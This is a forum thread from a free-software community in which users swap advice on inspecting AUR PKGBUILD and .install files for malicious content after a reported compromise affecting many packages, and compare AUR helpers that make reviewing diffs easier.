this post was submitted on 16 Jun 2026
50 points (100.0% liked)

libre

10208 readers
1 users here now

Welcome to libre

A comm dedicated to the fight for free software with an anti-capitalist perspective.

The struggle for libre computing cannot be disentangled from other forms of socialist reform. One must be willing to reject proprietary software as fiercely as they would reject capitalism. Luckily, we are not alone.

libretion

Resources

  1. Free Software, Free Society provides an excellent primer in the origins and theory around free software and the GNU Project, the pioneers of the Free Software Movement.
  2. Switch to GNU/Linux! If you're still using Windows in $CURRENT_YEAR, take Linux Mint for a spin. If you're ready to take the plunge, flock to Debian and design your dream system!

Rules

  1. Be on topic: Posts should be about free software and other hacktivst struggles. Topics about general tech news should be in the technology comm or programming comm. That doesn't mean all posts have to be serious though, memes are welcome!
  2. Avoid using misleading terms/speading misinformation: Here's a great article about what those words are. In short, try to avoid parroting common Techbro lingo and topics.
  3. Avoid being confrontational: People are in different stages of liberating their computing, focus on informing rather than accusing. Debatebro nonsense is not tolerated.
  4. All site-wide rules still apply

Artwork

founded 5 years ago
MODERATORS
 

Nearly 2000 packages affected now.

I'm starting to become sceptical of pacakge managers as a concept.

you are viewing a single comment's thread
view the rest of the comments
[–] TankieTanuki@hexbear.net 13 points 2 weeks ago (3 children)

I always review the PKGBUILD file before building something from the AUR. I just make sure the source URL looks sane. What else should I be looking out for?

[–] edie@lemmy.encryptionin.space 7 points 2 weeks ago* (last edited 2 weeks ago)

What it does/commands it runs (e.g. in the package() and such functions, the .install files too). If they pull in external scripts, especially from the internet. What said scripts do.


This user is suspected of being a cat. Please report any suspicious behavior.

[–] chgxvjh@hexbear.net 6 points 2 weeks ago* (last edited 2 weeks ago) (1 children)

Specific git revision is a risk because github will give you commits from forks.

Just tracking branches is kinda normal on AUR but is also not ideal since it exposes you to upstream getting screwed more directly.

Honestly my biggest disappointment with archlinux is that they haven't written up something about the attack vectors that were actually used. Seems really important when you are betting on individual responsibility so hard. It's also the norm to write an incident report after a fuckup even 0.1% of that size.

[–] TankieTanuki@hexbear.net 3 points 2 weeks ago* (last edited 2 weeks ago) (1 children)

I just do git clone "https://aur.archlinux.org/$/%7BAUR_pkg_name/%7D.git". Is that bad?

[–] chgxvjh@hexbear.net 3 points 2 weeks ago

I'm talking about the srcs used in the PKGBUILDs

[–] super_mario_420@hexbear.net 3 points 2 weeks ago (1 children)

Which aur helper are you using? I've been using yay for years, but now I'm thinking it makes it too easy to just mash Y and skip all diffs etc when updating. I'd like one that forces you to check the pkgbuild before installing something...

[–] TankieTanuki@hexbear.net 2 points 2 weeks ago (1 children)
[–] super_mario_420@hexbear.net 2 points 2 weeks ago (1 children)
[–] TankieTanuki@hexbear.net 1 points 2 weeks ago

It's more likely than you think!